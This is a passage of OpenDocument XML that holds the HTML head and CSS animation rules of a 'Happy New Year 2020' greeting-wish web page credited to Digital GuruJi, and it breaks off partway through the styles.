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23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688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68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86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0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3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932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3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6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37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3938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&lt;html&gt;</text:span><text:span text:style-name="T2"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T3">&lt;head&gt;</text:span><text:span text:style-name="T4"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T5">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;</text:span><text:span text:style-name="T6"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T7">&lt;div style="text-align: center;"&gt;</text:span><text:span text:style-name="T8"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T9">&lt;span style="font-family: Verdana, sans-serif;"&gt;Script By &lt;a href="https://digitalgurujie.com/" target="_blank"&gt;Digital GuruJi&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;</text:span><text:span text:style-name="T10"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T11">&lt;/div&gt;</text:span><text:span text:style-name="T12"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T13">&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-</text:span><text:span text:style-name="T14">8</text:span><text:span text:style-name="T15">"&gt;</text:span><text:span text:style-name="T16"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T17">&lt;meta name="viewport" content="width=device-width,initial-scale=</text:span><text:span text:style-name="T18">1</text:span><text:span text:style-name="T19">,maximum-scale=</text:span><text:span text:style-name="T20">1</text:span><text:span text:style-name="T21">"/&gt;</text:span><text:span text:style-name="T22"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T23">&lt;title&gt;Happy New Year<text:s/></text:span><text:span text:style-name="T24">2020</text:span><text:span text:style-name="T25">&lt;/title&gt;</text:span><text:span text:style-name="T26"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T27"><text:s/>&lt;meta name="google" value="notranslate"&gt;</text:span><text:span text:style-name="T28"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T29"><text:s/>&lt;meta property="og:type" content="Make your own wonderful wish for you loved one" /&gt;</text:span><text:span text:style-name="T30"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T31"><text:s/>&lt;meta property="og:title" content="Special Gift For you" /&gt;</text:span><text:span text:style-name="T32"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T33"><text:s/>&lt;meta property="og:url" content="yoursite.com/&gt;</text:span><text:span text:style-name="T34"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T35"><text:s/>&lt;meta property="og:description" content="[ CLICK HERE ]" /&gt;</text:span><text:span text:style-name="T36"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T37"><text:s/>&lt;meta property="og:site_name" content="Happy New Year<text:s/></text:span><text:span text:style-name="T38">2020</text:span><text:span text:style-name="T39">" /&gt;</text:span><text:span text:style-name="T40"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T40"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T41"><text:s/>&lt;meta property="og:site_img" content="https://</text:span><text:span text:style-name="T42">1</text:span><text:span text:style-name="T43">.bp.blogspot.com/-xEF_df</text:span><text:span text:style-name="T44">6</text:span><text:span text:style-name="T45">-cNg/XMbm-</text:span><text:span text:style-name="T46">0</text:span><text:span text:style-name="T47">_I</text:span><text:span text:style-name="T48">30</text:span><text:span text:style-name="T49">I/AAAAAAAAAWA/J</text:span><text:span text:style-name="T50">2</text:span><text:span text:style-name="T51">cue_SJmyYCu_y</text:span><text:span text:style-name="T52">9</text:span><text:span text:style-name="T53">pLctsb</text:span><text:span text:style-name="T54">3</text:span><text:span text:style-name="T55">M</text:span><text:span text:style-name="T56">2</text:span><text:span text:style-name="T57">wY</text:span><text:span text:style-name="T58">0</text:span><text:span text:style-name="T59">o</text:span><text:span text:style-name="T60">239</text:span><text:span text:style-name="T61">QCLcBGAs/s</text:span><text:span text:style-name="T62">1600</text:span><text:span text:style-name="T63">/w.png" /&gt;</text:span><text:span text:style-name="T64"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T65"><text:s/>&lt;link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/</text:span><text:span text:style-name="T66">3.5.2</text:span><text:span text:style-name="T67">/animate.min.css" /&gt;</text:span><text:span text:style-name="T68"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T69"><text:s/>&lt;link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/</text:span><text:span text:style-name="T70">4.7.0</text:span><text:span text:style-name="T71">/css/font-awesome.css" /&gt;</text:span><text:span text:style-name="T72"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T73"><text:s/>&lt;link href='https://fonts.googleapis.com/css?family=Sofia:&amp;effect=neon' rel='stylesheet'&gt;</text:span><text:span text:style-name="T74"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T75"><text:s/>&lt;link rel="icon" type="image/png" sizes="</text:span><text:span text:style-name="T76">32</text:span><text:span text:style-name="T77">x</text:span><text:span text:style-name="T78">32</text:span><text:span text:style-name="T79">" href="https://</text:span><text:span text:style-name="T80">1</text:span><text:span text:style-name="T81">.bp.blogspot.com/-xEF_df</text:span><text:span text:style-name="T82">6</text:span><text:span text:style-name="T83">-cNg/XMbm-</text:span><text:span text:style-name="T84">0</text:span><text:span text:style-name="T85">_I</text:span><text:span text:style-name="T86">30</text:span><text:span text:style-name="T87">I/AAAAAAAAAWA/J</text:span><text:span text:style-name="T88">2</text:span><text:span text:style-name="T89">cue_SJmyYCu_y</text:span><text:span text:style-name="T90">9</text:span><text:span text:style-name="T91">pLctsb</text:span><text:span text:style-name="T92">3</text:span><text:span text:style-name="T93">M</text:span><text:span text:style-name="T94">2</text:span><text:span text:style-name="T95">wY</text:span><text:span text:style-name="T96">0</text:span><text:span text:style-name="T97">o</text:span><text:span text:style-name="T98">239</text:span><text:span text:style-name="T99">QCLcBGAs/s</text:span><text:span text:style-name="T100">1600</text:span><text:span text:style-name="T101">/w.png"&gt;</text:span><text:span text:style-name="T102"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T103">&lt;style&gt;</text:span><text:span text:style-name="T104"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T105">i {</text:span><text:span text:style-name="T106"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T107"><text:s/>color:#f</text:span><text:span text:style-name="T108">06414</text:span><text:span text:style-name="T109">;</text:span><text:span text:style-name="T110"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T111"><text:s/>}</text:span><text:span text:style-name="T112"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T113">input[type=name], select {</text:span><text:span text:style-name="T114"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T115"><text:s/>width:<text:s/></text:span><text:span text:style-name="T116">100</text:span><text:span text:style-name="T117">%;</text:span><text:span text:style-name="T118"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T119"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T120">12</text:span><text:span text:style-name="T121">px<text:s/></text:span><text:span text:style-name="T122">20</text:span><text:span text:style-name="T123">px;</text:span><text:span text:style-name="T124"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T125"><text:s/>margin:<text:s/></text:span><text:span text:style-name="T126">4</text:span><text:span text:style-name="T127">px<text:s/></text:span><text:span text:style-name="T128">0</text:span><text:span text:style-name="T129">;</text:span><text:span text:style-name="T130"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T131"><text:s/>display: inline-block;</text:span><text:span text:style-name="T132"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T133"><text:s/>border:<text:s/></text:span><text:span text:style-name="T134">1</text:span><text:span text:style-name="T135">px solid #ccc;</text:span><text:span text:style-name="T136"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T137"><text:s/>border-radius:<text:s/></text:span><text:span text:style-name="T138">4</text:span><text:span text:style-name="T139">px;</text:span><text:span text:style-name="T140"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T141"><text:s/>box-sizing: border-box;</text:span><text:span text:style-name="T142"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T143">}</text:span><text:span text:style-name="T144"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T145">.footerbtn {</text:span><text:span text:style-name="T146"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T147"><text:s/></text:span><text:span text:style-name="T148"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T149"><text:s/>display: block;</text:span><text:span text:style-name="T150"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T151"><text:s/>line-height:<text:s/></text:span><text:span text:style-name="T152">15</text:span><text:span text:style-name="T153">px;</text:span><text:span text:style-name="T154"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T155"><text:s/>position: fixed;</text:span><text:span text:style-name="T156"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T157"><text:s/>left:</text:span><text:span text:style-name="T158">0</text:span><text:span text:style-name="T159">px;</text:span><text:span text:style-name="T160"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T161"><text:s/>bottom:</text:span><text:span text:style-name="T162">0</text:span><text:span text:style-name="T163">px;</text:span><text:span text:style-name="T164"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T165"><text:s/>height:</text:span><text:span text:style-name="T166">40</text:span><text:span text:style-name="T167">px;</text:span><text:span text:style-name="T168"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T169"><text:s/></text:span><text:span text:style-name="T170"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T171">border-radius:<text:s/></text:span><text:span text:style-name="T172">15</text:span><text:span text:style-name="T173">px;</text:span><text:span text:style-name="T174"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T175"><text:s/>box-sizing: border-box;</text:span><text:span text:style-name="T176"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T177"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T178">5</text:span><text:span text:style-name="T179">px;</text:span><text:span text:style-name="T180"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T181"><text:s/>background:#</text:span><text:span text:style-name="T182">34</text:span><text:span text:style-name="T183">af</text:span><text:span text:style-name="T184">23</text:span><text:span text:style-name="T185">;</text:span><text:span text:style-name="T186"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T187"><text:s/>color: #ffffff;</text:span><text:span text:style-name="T188"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T189"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T190">18</text:span><text:span text:style-name="T191">px;</text:span><text:span text:style-name="T192"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T193"><text:s/>text-align: center;</text:span><text:span text:style-name="T194"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T195"><text:s/>text-decoration: none;</text:span><text:span text:style-name="T196"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T197"><text:s/>width:</text:span><text:span text:style-name="T198">95</text:span><text:span text:style-name="T199">%;</text:span><text:span text:style-name="T200"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T201"><text:s/>margin-left:</text:span><text:span text:style-name="T202">10</text:span><text:span text:style-name="T203">px;</text:span><text:span text:style-name="T204"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T205"><text:s/>margin-right:</text:span><text:span text:style-name="T206">30</text:span><text:span text:style-name="T207">px;</text:span><text:span text:style-name="T208"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T209"><text:s/>box-shadow:<text:s/></text:span><text:span text:style-name="T210">0 4</text:span><text:span text:style-name="T211">px<text:s/></text:span><text:span text:style-name="T212">12</text:span><text:span text:style-name="T213">px<text:s/></text:span><text:span text:style-name="T214">0<text:s/></text:span><text:span text:style-name="T215">rgba(</text:span><text:span text:style-name="T216">0</text:span><text:span text:style-name="T217">,<text:s/></text:span><text:span text:style-name="T218">0</text:span><text:span text:style-name="T219">,<text:s/></text:span><text:span text:style-name="T220">0</text:span><text:span text:style-name="T221">, .</text:span><text:span text:style-name="T222">3</text:span><text:span text:style-name="T223">);</text:span><text:span text:style-name="T224"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T225"><text:s/>animation: footer infinite linear<text:s/></text:span><text:span text:style-name="T226">1</text:span><text:span text:style-name="T227">s;</text:span><text:span text:style-name="T228"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T229"><text:s/>-webkit-transform: translate</text:span><text:span text:style-name="T230">3</text:span><text:span text:style-name="T231">d(</text:span><text:span text:style-name="T232">30</text:span><text:span text:style-name="T233">%,</text:span><text:span text:style-name="T234">0,0</text:span><text:span text:style-name="T235">);</text:span><text:span text:style-name="T236"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T237"><text:s/>transform: translate</text:span><text:span text:style-name="T238">3</text:span><text:span text:style-name="T239">d(</text:span><text:span text:style-name="T240">30</text:span><text:span text:style-name="T241">%,</text:span><text:span text:style-name="T242">0,0</text:span><text:span text:style-name="T243">);</text:span><text:span text:style-name="T244"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T245"><text:s/>position: fixed;</text:span><text:span text:style-name="T246"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T247"><text:s/></text:span><text:span text:style-name="T248"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T249">}</text:span><text:span text:style-name="T250"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T250"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T251">.footerbtn :active {</text:span><text:span text:style-name="T252"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T253"><text:s/>box-shadow: none</text:span><text:span text:style-name="T254"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T255"><text:s/>}</text:span><text:span text:style-name="T256"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T256"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T257"><text:s/>@-webkit-keyframes footer {</text:span><text:span text:style-name="T258"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T259"><text:s/>from {</text:span><text:span text:style-name="T260"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T261"><text:s/>-webkit-transform: rotateZ(</text:span><text:span text:style-name="T262">0</text:span><text:span text:style-name="T263">)</text:span><text:span text:style-name="T264"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T265"><text:s/>}</text:span><text:span text:style-name="T266"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T267"><text:s/>25</text:span><text:span text:style-name="T268">% {</text:span><text:span text:style-name="T269"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T270"><text:s/>-webkit-transform: rotateZ(</text:span><text:span text:style-name="T271">0</text:span><text:span text:style-name="T272">deg)</text:span><text:span text:style-name="T273"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T274"><text:s/>}</text:span><text:span text:style-name="T275"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T276"><text:s/>50</text:span><text:span text:style-name="T277">% {</text:span><text:span text:style-name="T278"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T279"><text:s/>-webkit-transform: rotateZ(</text:span><text:span text:style-name="T280">0</text:span><text:span text:style-name="T281">deg)</text:span><text:span text:style-name="T282"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T283"><text:s/>}</text:span><text:span text:style-name="T284"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T285"><text:s/>75</text:span><text:span text:style-name="T286">% {</text:span><text:span text:style-name="T287"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T288"><text:s/>-webkit-transform: rotateZ(</text:span><text:span text:style-name="T289">0</text:span><text:span text:style-name="T290">deg)</text:span><text:span text:style-name="T291"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T292"><text:s/>}</text:span><text:span text:style-name="T293"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T294"><text:s/>to {</text:span><text:span text:style-name="T295"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T296"><text:s/>-webkit-transform: rotateZ(</text:span><text:span text:style-name="T297">0</text:span><text:span text:style-name="T298">)</text:span><text:span text:style-name="T299"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T300"><text:s/>}}</text:span><text:span text:style-name="T301"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T301"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T302">@-webkit-keyframes jello { from,<text:s/></text:span><text:span text:style-name="T303">11.1</text:span><text:span text:style-name="T304">%, to { transform: none; }</text:span><text:span text:style-name="T305"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T306"><text:s/>22.2</text:span><text:span text:style-name="T307">% { transform: skewX(-</text:span><text:span text:style-name="T308">12.5</text:span><text:span text:style-name="T309">deg) skewY(-</text:span><text:span text:style-name="T310">12.5</text:span><text:span text:style-name="T311">deg); }</text:span><text:span text:style-name="T312"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T313"><text:s/>33.3</text:span><text:span text:style-name="T314">% { transform: skewX(</text:span><text:span text:style-name="T315">6.25</text:span><text:span text:style-name="T316">deg) skewY(</text:span><text:span text:style-name="T317">6.25</text:span><text:span text:style-name="T318">deg); }</text:span><text:span text:style-name="T319"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T320"><text:s/>44.4</text:span><text:span text:style-name="T321">% { transform: skewX(-</text:span><text:span text:style-name="T322">3.125</text:span><text:span text:style-name="T323">deg) skewY(-</text:span><text:span text:style-name="T324">3.125</text:span><text:span text:style-name="T325">deg); }</text:span><text:span text:style-name="T326"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T327"><text:s/>55.5</text:span><text:span text:style-name="T328">% { transform: skewX(</text:span><text:span text:style-name="T329">1.5625</text:span><text:span text:style-name="T330">deg) skewY(</text:span><text:span text:style-name="T331">1.5625</text:span><text:span text:style-name="T332">deg); }</text:span><text:span text:style-name="T333"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T334"><text:s/>66.6</text:span><text:span text:style-name="T335">% { transform: skewX(-</text:span><text:span text:style-name="T336">0.78125</text:span><text:span text:style-name="T337">deg) skewY(-</text:span><text:span text:style-name="T338">0.78125</text:span><text:span text:style-name="T339">deg); }</text:span><text:span text:style-name="T340"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T341"><text:s/>77.7</text:span><text:span text:style-name="T342">% { transform: skewX(</text:span><text:span text:style-name="T343">0.390625</text:span><text:span text:style-name="T344">deg) skewY(</text:span><text:span text:style-name="T345">0.390625</text:span><text:span text:style-name="T346">deg); }</text:span><text:span text:style-name="T347"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T348"><text:s/>88.8</text:span><text:span text:style-name="T349">% { transform: skewX(-</text:span><text:span text:style-name="T350">0.1953125</text:span><text:span text:style-name="T351">deg) skewY(-</text:span><text:span text:style-name="T352">0.1953125</text:span><text:span text:style-name="T353">deg); }}</text:span><text:span text:style-name="T354"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T354"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T355"><text:s/>.wb</text:span><text:span text:style-name="T356">1</text:span><text:span text:style-name="T357">{position:fixed;left:</text:span><text:span text:style-name="T358">1</text:span><text:span text:style-name="T359">%; width:auto;height:</text:span><text:span text:style-name="T360">100</text:span><text:span text:style-name="T361">%;top:</text:span><text:span text:style-name="T362">1</text:span><text:span text:style-name="T363">%;color:#</text:span><text:span text:style-name="T364">000</text:span><text:span text:style-name="T365">;}</text:span><text:span text:style-name="T366"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T367"><text:s/>.wb</text:span><text:span text:style-name="T368">2</text:span><text:span text:style-name="T369">{position:fixed;right:</text:span><text:span text:style-name="T370">1</text:span><text:span text:style-name="T371">%; width:auto;height:</text:span><text:span text:style-name="T372">100</text:span><text:span text:style-name="T373">%;top:</text:span><text:span text:style-name="T374">1</text:span><text:span text:style-name="T375">%;color:#</text:span><text:span text:style-name="T376">000</text:span><text:span text:style-name="T377">;}</text:span><text:span text:style-name="T378"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T379">.bubbles {</text:span><text:span text:style-name="T380"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T381">font-family: arial;</text:span><text:span text:style-name="T382"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T383">}</text:span><text:span text:style-name="T384"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T384"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T385">.bubbles hi {</text:span><text:span text:style-name="T386"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T387">font-family: 'Luckiest Guy', cursive;</text:span><text:span text:style-name="T388"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T389">color: black;</text:span><text:span text:style-name="T390"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T391">}</text:span><text:span text:style-name="T392"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T392"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T393">hi {</text:span><text:span text:style-name="T394"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T395"><text:s/>font-size:</text:span><text:span text:style-name="T396">2.5</text:span><text:span text:style-name="T397">em;</text:span><text:span text:style-name="T398"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T399"><text:s/>user-select:none;</text:span><text:span text:style-name="T400"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T401">}</text:span><text:span text:style-name="T402"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T402"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T403">hi span { display:inline-block; animation:float .</text:span><text:span text:style-name="T404">2</text:span><text:span text:style-name="T405">s ease-in-out infinite; }</text:span><text:span text:style-name="T406"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T407"><text:s/>@keyframes float {</text:span><text:span text:style-name="T408"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T409"><text:s/>0</text:span><text:span text:style-name="T410">%,</text:span><text:span text:style-name="T411">100</text:span><text:span text:style-name="T412">%{ transform:none; }</text:span><text:span text:style-name="T413"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T414"><text:s/>33</text:span><text:span text:style-name="T415">%{ transform:translateY(-</text:span><text:span text:style-name="T416">1</text:span><text:span text:style-name="T417">px) rotate(-</text:span><text:span text:style-name="T418">2</text:span><text:span text:style-name="T419">deg); }</text:span><text:span text:style-name="T420"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T421"><text:s/>66</text:span><text:span text:style-name="T422">%{ transform:translateY(</text:span><text:span text:style-name="T423">1</text:span><text:span text:style-name="T424">px) rotate(</text:span><text:span text:style-name="T425">2</text:span><text:span text:style-name="T426">deg); }</text:span><text:span text:style-name="T427"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T428">}</text:span><text:span text:style-name="T429"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T430">body:hover span { animation:bounce .</text:span><text:span text:style-name="T431">6</text:span><text:span text:style-name="T432">s; }</text:span><text:span text:style-name="T433"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T434">@keyframes bounce {</text:span><text:span text:style-name="T435"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T436"><text:s/>0</text:span><text:span text:style-name="T437">%,</text:span><text:span text:style-name="T438">100</text:span><text:span text:style-name="T439">%{ transform:translate(</text:span><text:span text:style-name="T440">0</text:span><text:span text:style-name="T441">); }</text:span><text:span text:style-name="T442"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T443"><text:s/>25</text:span><text:span text:style-name="T444">%{ transform:rotateX(</text:span><text:span text:style-name="T445">20</text:span><text:span text:style-name="T446">deg) translateY(</text:span><text:span text:style-name="T447">2</text:span><text:span text:style-name="T448">px) rotate(-</text:span><text:span text:style-name="T449">3</text:span><text:span text:style-name="T450">deg); }</text:span><text:span text:style-name="T451"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T452"><text:s/>50</text:span><text:span text:style-name="T453">%{ transform:translateY(-</text:span><text:span text:style-name="T454">20</text:span><text:span text:style-name="T455">px) rotate(</text:span><text:span text:style-name="T456">3</text:span><text:span text:style-name="T457">deg) scale(</text:span><text:span text:style-name="T458">1.1</text:span><text:span text:style-name="T459">); }</text:span><text:span text:style-name="T460"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T461">}</text:span><text:span text:style-name="T462"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T462"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T463">@import url(https://lh</text:span><text:span text:style-name="T464">6</text:span><text:span text:style-name="T465">.googleusercontent.com/proxy/YfzDH</text:span><text:span text:style-name="T466">9</text:span><text:span text:style-name="T467">rGEX</text:span><text:span text:style-name="T468">2</text:span><text:span text:style-name="T469">_</text:span><text:span text:style-name="T470">6</text:span><text:span text:style-name="T471">c</text:span><text:span text:style-name="T472">0</text:span><text:span text:style-name="T473">-ipAee-UwIRD</text:span><text:span text:style-name="T474">6</text:span><text:span text:style-name="T475">yJ</text:span><text:span text:style-name="T476">2</text:span><text:span text:style-name="T477">S-</text:span><text:span text:style-name="T478">9</text:span><text:span text:style-name="T479">zgBkCvqKQxaNYcbJ</text:span><text:span text:style-name="T480">399</text:span><text:span text:style-name="T481">-QVTehEPWRHJ-iB</text:span><text:span text:style-name="T482">2</text:span><text:span text:style-name="T483">IRCLJ-HGPW_wv</text:span><text:span text:style-name="T484">9</text:span><text:span text:style-name="T485">fmo</text:span><text:span text:style-name="T486">8</text:span><text:span text:style-name="T487">T</text:span><text:span text:style-name="T488">2</text:span><text:span text:style-name="T489">WG</text:span><text:span text:style-name="T490">1</text:span><text:span text:style-name="T491">qQ=s</text:span><text:span text:style-name="T492">0</text:span><text:span text:style-name="T493">-d);</text:span><text:span text:style-name="T494"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T494"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T495">h</text:span><text:span text:style-name="T496">1<text:s/></text:span><text:span text:style-name="T497">{</text:span><text:span text:style-name="T498"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T499"><text:s/>animation:glow<text:s/></text:span><text:span text:style-name="T500">10</text:span><text:span text:style-name="T501">s ease-in-out infinite;</text:span><text:span text:style-name="T502"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T503">}</text:span><text:span text:style-name="T504"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T504"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T504"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T504"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T505">* { box-sizing:border-box; }</text:span><text:span text:style-name="T506"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T506"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T507">figure {</text:span><text:span text:style-name="T508"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T509"><text:s/>animation:wobble<text:s/></text:span><text:span text:style-name="T510">5</text:span><text:span text:style-name="T511">s ease-in-out infinite;</text:span><text:span text:style-name="T512"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T513"><text:s/>transform-origin:center center;</text:span><text:span text:style-name="T514"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T515"><text:s/>transform-style:preserve-</text:span><text:span text:style-name="T516">3</text:span><text:span text:style-name="T517">d;</text:span><text:span text:style-name="T518"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T519">}</text:span><text:span text:style-name="T520"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T520"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T521">@keyframes wobble {</text:span><text:span text:style-name="T522"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T523"><text:s/>0</text:span><text:span text:style-name="T524">%,</text:span><text:span text:style-name="T525">100</text:span><text:span text:style-name="T526">%{ transform:rotate</text:span><text:span text:style-name="T527">3</text:span><text:span text:style-name="T528">d(</text:span><text:span text:style-name="T529">1,1,0,40</text:span><text:span text:style-name="T530">deg); }</text:span><text:span text:style-name="T531"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T532"><text:s/>25</text:span><text:span text:style-name="T533">%{ transform:rotate</text:span><text:span text:style-name="T534">3</text:span><text:span text:style-name="T535">d(-</text:span><text:span text:style-name="T536">1,1,0,40</text:span><text:span text:style-name="T537">deg); }</text:span><text:span text:style-name="T538"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T539"><text:s/>50</text:span><text:span text:style-name="T540">%{ transform:rotate</text:span><text:span text:style-name="T541">3</text:span><text:span text:style-name="T542">d(-</text:span><text:span text:style-name="T543">1</text:span><text:span text:style-name="T544">,-</text:span><text:span text:style-name="T545">1,0,40</text:span><text:span text:style-name="T546">deg); }</text:span><text:span text:style-name="T547"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T548"><text:s/>75</text:span><text:span text:style-name="T549">%{ transform:rotate</text:span><text:span text:style-name="T550">3</text:span><text:span text:style-name="T551">d(</text:span><text:span text:style-name="T552">1</text:span><text:span text:style-name="T553">,-</text:span><text:span text:style-name="T554">1,0,40</text:span><text:span text:style-name="T555">deg); }</text:span><text:span text:style-name="T556"/></text:p>
